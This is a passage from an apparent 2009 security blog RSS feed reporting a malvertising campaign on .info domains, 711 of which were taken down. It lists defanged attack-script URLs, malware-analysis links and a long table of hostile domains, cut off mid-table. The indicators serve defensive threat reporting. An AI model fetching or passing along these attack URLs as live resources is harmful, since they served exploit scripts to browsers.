<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Andrew Martin &#187; Intrusion Detection</title>
	<atom:link href="http://www.martinsecurity.net/category/intrusion-detection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.martinsecurity.net</link>
	<description>Viewing InfoSec from the trenches (formerly Real Security)</description>
	<lastBuildDate>Fri, 18 Dec 2009 19:29:17 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Major Stealthy Malware Campaign &#8211; 711 Domains Taken Down</title>
		<link>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/</link>
		<comments>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 21:52:18 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=427</guid>
		<description><![CDATA[Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which [...]]]></description>
			<content:encoded><![CDATA[<p>Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which also made investigating the source a pain. Performing some searches on the domains strangely did not yield any information from common sources such as malwareurl, malwaredomainlist, McAfee Site Adviser, etc.</p>
<p>To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!</p>
<p>Attack scripts:</p>
<p>hxxp://us.hn0.info/f/1/ie.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372" href="http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372">http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372</a></p>
<p>hxxp://us.hn0.info/f/1/ff.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360" href="http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360">http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360</a></p>
<p>hxxp://us.hn0.info/f/1/cosplay.swf<br />
<a title="blocked::http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf" href="http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf">http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf</a></p>
<p>Shellcode:<br />
<a title="blocked::http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262" href="http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262">http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262</a></p>
<p>The domains:</p>
<table style="border-collapse: collapse; width: 271pt;" border="0" cellspacing="0" cellpadding="0" width="361">
<col style="width: 55pt;" width="73"></col>
<col style="width: 108pt;" width="144"></col>
<col style="width: 60pt;" width="80"></col>
<col style="width: 48pt;" width="64"></col>
<tbody>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt; width: 55pt;" width="73" height="20">FK0.INFO<span> </span></td>
<td style="width: 108pt;" width="144">AC0.INFO<span> </span></td>
<td style="width: 60pt;" width="80">KD8.INFO<span> </span></td>
<td style="width: 48pt;" width="64">JZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK6.INFO<span> </span></td>
<td>AE0.INFO<span> </span></td>
<td>KD9.INFO<span> </span></td>
<td>JZ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK7.INFO<span> </span></td>
<td>AE6.INFO<span> </span></td>
<td>CUUB.INFO<span> </span></td>
<td>JZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK8.INFO<span> </span></td>
<td>AE9.INFO<span> </span></td>
<td>CXXB.INFO<span> </span></td>
<td>JZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK9.INFO<span> </span></td>
<td>AF0.INFO<span> </span></td>
<td>DRRB.INFO<span> </span></td>
<td>KA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL0.INFO<span> </span></td>
<td>AF5.INFO<span> </span></td>
<td>DTTB.INFO<span> </span></td>
<td>KB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL7.INFO<span> </span></td>
<td>AF8.INFO<span> </span></td>
<td>DYYB.INFO<span> </span></td>
<td>KB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL8.INFO<span> </span></td>
<td>AF9.INFO<span> </span></td>
<td>GJGJ.INFO<span> </span></td>
<td>KC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM0.INFO<span> </span></td>
<td>AG0.INFO<span> </span></td>
<td>RFVT.INFO<span> </span></td>
<td>KC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM9.INFO<span> </span></td>
<td>AG7.INFO<span> </span></td>
<td>TGBY.INFO<span> </span></td>
<td>KC8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN3.INFO<span> </span></td>
<td>AG8.INFO<span> </span></td>
<td>UJMI.INFO<span> </span></td>
<td>KD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN4.INFO<span> </span></td>
<td>AG9.INFO<span> </span></td>
<td>YHNU.INFO<span> </span></td>
<td>KD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN5.INFO<span> </span></td>
<td>AH0.INFO<span> </span></td>
<td>DT0.INFO<span> </span></td>
<td>KD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN6.INFO<span> </span></td>
<td>AH5.INFO<span> </span></td>
<td>DV0.INFO<span> </span></td>
<td>HX0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN7.INFO<span> </span></td>
<td>AH7.INFO<span> </span></td>
<td>DV6.INFO<span> </span></td>
<td>HY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN8.INFO<span> </span></td>
<td>AI0.INFO<span> </span></td>
<td>DV7.INFO<span> </span></td>
<td>HY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO0.INFO<span> </span></td>
<td>AJ3.INFO<span> </span></td>
<td>DW0.INFO<span> </span></td>
<td>HY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO5.INFO<span> </span></td>
<td>AJ4.INFO<span> </span></td>
<td>DW9.INFO<span> </span></td>
<td>HY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO6.INFO<span> </span></td>
<td>AJ5.INFO<span> </span></td>
<td>DX6.INFO<span> </span></td>
<td>HZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO7.INFO<span> </span></td>
<td>AJ7.INFO<span> </span></td>
<td>DX7.INFO<span> </span></td>
<td>HZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP4.INFO<span> </span></td>
<td>AJ9.INFO<span> </span></td>
<td>DX8.INFO<span> </span></td>
<td>HZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP5.INFO<span> </span></td>
<td>AK0.INFO<span> </span></td>
<td>DY2.INFO<span> </span></td>
<td>HZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP9.INFO<span> </span></td>
<td>AN0.INFO<span> </span></td>
<td>DY5.INFO<span> </span></td>
<td>HZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ0.INFO<span> </span></td>
<td>AO0.INFO<span> </span></td>
<td>DZ4.INFO<span> </span></td>
<td>HZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ3.INFO<span> </span></td>
<td>AO3.INFO<span> </span></td>
<td>DZ5.INFO<span> </span></td>
<td>IA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ4.INFO<span> </span></td>
<td>AO8.INFO<span> </span></td>
<td>EA0.INFO<span> </span></td>
<td>IB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ6.INFO<span> </span></td>
<td>AP3.INFO<span> </span></td>
<td>EA2.INFO<span> </span></td>
<td>IB4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ7.INFO<span> </span></td>
<td>AP9.INFO<span> </span></td>
<td>EA4.INFO<span> </span></td>
<td>IB5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FR0.INFO<span> </span></td>
<td>AQ0.INFO<span> </span></td>
<td>EA5.INFO<span> </span></td>
<td>IB6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS0.INFO<span> </span></td>
<td>AQ3.INFO<span> </span></td>
<td>EA6.INFO<span> </span></td>
<td>IB7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS4.INFO<span> </span></td>
<td>AQ9.INFO<span> </span></td>
<td>EA7.INFO<span> </span></td>
<td>IB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS6.INFO<span> </span></td>
<td>AR0.INFO<span> </span></td>
<td>EA8.INFO<span> </span></td>
<td>IB9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS7.INFO<span> </span></td>
<td>AT4.INFO<span> </span></td>
<td>EB0.INFO<span> </span></td>
<td>IC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT0.INFO<span> </span></td>
<td>AU0.INFO<span> </span></td>
<td>EB4.INFO<span> </span></td>
<td>IF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT5.INFO<span> </span></td>
<td>AW0.INFO<span> </span></td>
<td>ED0.INFO<span> </span></td>
<td>IF5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT9.INFO<span> </span></td>
<td>AX0.INFO<span> </span></td>
<td>ED3.INFO<span> </span></td>
<td>IF6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU0.INFO<span> </span></td>
<td>AX3.INFO<span> </span></td>
<td>EF2.INFO<span> </span></td>
<td>IF7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU4.INFO<span> </span></td>
<td>AY0.INFO<span> </span></td>
<td>EH4.INFO<span> </span></td>
<td>IF8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU8.INFO<span> </span></td>
<td>AZ5.INFO<span> </span></td>
<td>EH7.INFO<span> </span></td>
<td>IF9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV4.INFO<span> </span></td>
<td>AZ6.INFO<span> </span></td>
<td>EI4.INFO<span> </span></td>
<td>IG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV6.INFO<span> </span></td>
<td>AZ7.INFO<span> </span></td>
<td>EI5.INFO<span> </span></td>
<td>IG6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV7.INFO<span> </span></td>
<td>AZ8.INFO<span> </span></td>
<td>EI6.INFO<span> </span></td>
<td>IG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV8.INFO<span> </span></td>
<td>AZ9.INFO<span> </span></td>
<td>EI8.INFO<span> </span></td>
<td>IH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV9.INFO<span> </span></td>
<td>BC0.INFO<span> </span></td>
<td>EI9.INFO<span> </span></td>
<td>IH2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW0.INFO<span> </span></td>
<td>BC6.INFO<span> </span></td>
<td>EK0.INFO<span> </span></td>
<td>IH3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW5.INFO<span> </span></td>
<td>BC8.INFO<span> </span></td>
<td>EK2.INFO<span> </span></td>
<td>IH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW6.INFO<span> </span></td>
<td>BC9.INFO<span> </span></td>
<td>EK4.INFO<span> </span></td>
<td>IH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW8.INFO<span> </span></td>
<td>BD3.INFO<span> </span></td>
<td>EK5.INFO<span> </span></td>
<td>IH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW9.INFO<span> </span></td>
<td>BF0.INFO<span> </span></td>
<td>EK7.INFO<span> </span></td>
<td>IJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY0.INFO<span> </span></td>
<td>BF4.INFO<span> </span></td>
<td>EL0.INFO<span> </span></td>
<td>IJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY2.INFO<span> </span></td>
<td>BF6.INFO<span> </span></td>
<td>EL6.INFO<span> </span></td>
<td>IJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY5.INFO<span> </span></td>
<td>BF8.INFO<span> </span></td>
<td>EM5.INFO<span> </span></td>
<td>IJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY6.INFO<span> </span></td>
<td>BF9.INFO<span> </span></td>
<td>EM8.INFO<span> </span></td>
<td>IJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ0.INFO<span> </span></td>
<td>BG0.INFO<span> </span></td>
<td>EM9.INFO<span> </span></td>
<td>IK3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ3.INFO<span> </span></td>
<td>BH0.INFO<span> </span></td>
<td>EN8.INFO<span> </span></td>
<td>IK4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ4.INFO<span> </span></td>
<td>BH2.INFO<span> </span></td>
<td>EO0.INFO<span> </span></td>
<td>IK5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ5.INFO<span> </span></td>
<td>BI6.INFO<span> </span></td>
<td>EO3.INFO<span> </span></td>
<td>IK6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ7.INFO<span> </span></td>
<td>BI7.INFO<span> </span></td>
<td>EO5.INFO<span> </span></td>
<td>IK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ8.INFO<span> </span></td>
<td>BJ4.INFO<span> </span></td>
<td>EO6.INFO<span> </span></td>
<td>IK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GB0.INFO<span> </span></td>
<td>BK2.INFO<span> </span></td>
<td>EO7.INFO<span> </span></td>
<td>IK9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC0.INFO<span> </span></td>
<td>BL0.INFO<span> </span></td>
<td>EO8.INFO<span> </span></td>
<td>IL0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC6.INFO<span> </span></td>
<td>BL8.INFO<span> </span></td>
<td>EO9.INFO<span> </span></td>
<td>IL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC7.INFO<span> </span></td>
<td>BL9.INFO<span> </span></td>
<td>EP6.INFO<span> </span></td>
<td>IL8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC8.INFO<span> </span></td>
<td>BM3.INFO<span> </span></td>
<td>EP7.INFO<span> </span></td>
<td>IO2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
<td>IO3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
<td>IO5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
<td>IO6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
<td>IQ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
<td>IR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
<td>IR6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
<td>IR7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
<td>IR9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
<td>IU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
<td>IU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
<td>IV2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
<td>IV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
<td>IV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
<td>IV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
<td>IW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
<td>IW2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
<td>IW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
<td>IW5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
<td>IW6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
<td>IX4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
<td>IX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
<td>IX6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
<td>IX7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
<td>IY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
<td>IY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
<td>IY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
<td>IY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL9.INFO<span> </span></td>
<td>BT0.INFO<span> </span></td>
<td>FG3.INFO<span> </span></td>
<td>IY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM8.INFO<span> </span></td>
<td>BU0.INFO<span> </span></td>
<td>FG5.INFO<span> </span></td>
<td>IY8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM9.INFO<span> </span></td>
<td>BU9.INFO<span> </span></td>
<td>FG8.INFO<span> </span></td>
<td>IY9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN0.INFO<span> </span></td>
<td>BV0.INFO<span> </span></td>
<td>FH0.INFO<span> </span></td>
<td>IZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN5.INFO<span> </span></td>
<td>BV2.INFO<span> </span></td>
<td>FH4.INFO<span> </span></td>
<td>IZ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN6.INFO<span> </span></td>
<td>BV5.INFO<span> </span></td>
<td>FH5.INFO<span> </span></td>
<td>IZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN7.INFO<span> </span></td>
<td>BV7.INFO<span> </span></td>
<td>FH6.INFO<span> </span></td>
<td>IZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN9.INFO<span> </span></td>
<td>BV8.INFO<span> </span></td>
<td>FH7.INFO<span> </span></td>
<td>IZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GP8.INFO<span> </span></td>
<td>BV9.INFO<span> </span></td>
<td>FH8.INFO<span> </span></td>
<td>IZ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX2.INFO<span> </span></td>
<td>WGREATDREAM.COM<span> </span></td>
<td>FH9.INFO<span> </span></td>
<td>JA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX7.INFO<span> </span></td>
<td>GP0.INFO<span> </span></td>
<td>FI4.INFO<span> </span></td>
<td>JB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX9.INFO<span> </span></td>
<td>GQ0.INFO<span> </span></td>
<td>FJ0.INFO<span> </span></td>
<td>JC2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BY5.INFO<span> </span></td>
<td>GQ2.INFO<span> </span></td>
<td>FJ2.INFO<span> </span></td>
<td>JC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BZ9.INFO<span> </span></td>
<td>GQ3.INFO<span> </span></td>
<td>FJ3.INFO<span> </span></td>
<td>JC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB0.INFO<span> </span></td>
<td>GQ4.INFO<span> </span></td>
<td>FJ4.INFO<span> </span></td>
<td>JD2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB6.INFO<span> </span></td>
<td>GQ5.INFO<span> </span></td>
<td>FJ5.INFO<span> </span></td>
<td>JD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE3.INFO<span> </span></td>
<td>GQ9.INFO<span> </span></td>
<td>FJ6.INFO<span> </span></td>
<td>JD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE7.INFO<span> </span></td>
<td>GR6.INFO<span> </span></td>
<td>FJ7.INFO<span> </span></td>
<td>KE2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF0.INFO<span> </span></td>
<td>GR9.INFO<span> </span></td>
<td>FJ8.INFO<span> </span></td>
<td>KF3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF3.INFO<span> </span></td>
<td>GS0.INFO<span> </span></td>
<td>FJ9.INFO<span> </span></td>
<td>KF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF4.INFO<span> </span></td>
